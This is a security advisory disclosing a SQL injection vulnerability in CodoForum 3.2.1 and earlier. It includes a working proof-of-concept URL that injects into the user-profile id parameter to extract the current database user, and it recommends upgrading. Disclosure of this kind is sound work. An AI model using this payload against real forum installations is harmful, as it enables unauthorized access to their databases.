34 lines
No EOL
1.2 KiB
Text
34 lines
No EOL
1.2 KiB
Text
1. Advisory Information
|
|
========================================
|
|
Title : CodoForum <= 3.2.1 Remote SQL Injection Vulnerability
|
|
Vendor Homepage : https://codoforum.com/
|
|
Remotely Exploitable : Yes
|
|
Versions Affected : Prior to 3.2.1
|
|
Tested on : Ubuntu (Apache) | PHP 5.5.9 | MySQL 5.5
|
|
Vulnerability : SQL Injection (Critical/High)
|
|
Date : 23.07.2016
|
|
Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
|
|
|
|
|
2. CREDIT
|
|
========================================
|
|
This vulnerability was identified during penetration test by Yakir Wizman
|
|
|
|
|
|
3. Description
|
|
========================================
|
|
The script that parses the request URL and displays user profile depending on
|
|
the retrieved id does not use proper input validation against SQL injection.
|
|
|
|
|
|
4. TECHNICAL DETAILS & POC
|
|
========================================
|
|
SQL Injection Proof of Concept
|
|
----------------------------------------
|
|
Example for fetching current user database:
|
|
http://server/forum/index.php?u=/user/profile/1%20AND%20(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT((MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,451))))s),%208446744073709551610,%208446744073709551610)))
|
|
|
|
|
|
5. SOLUTION
|
|
========================================
|
|
Upgrade to the latest version v3.4 build 19 |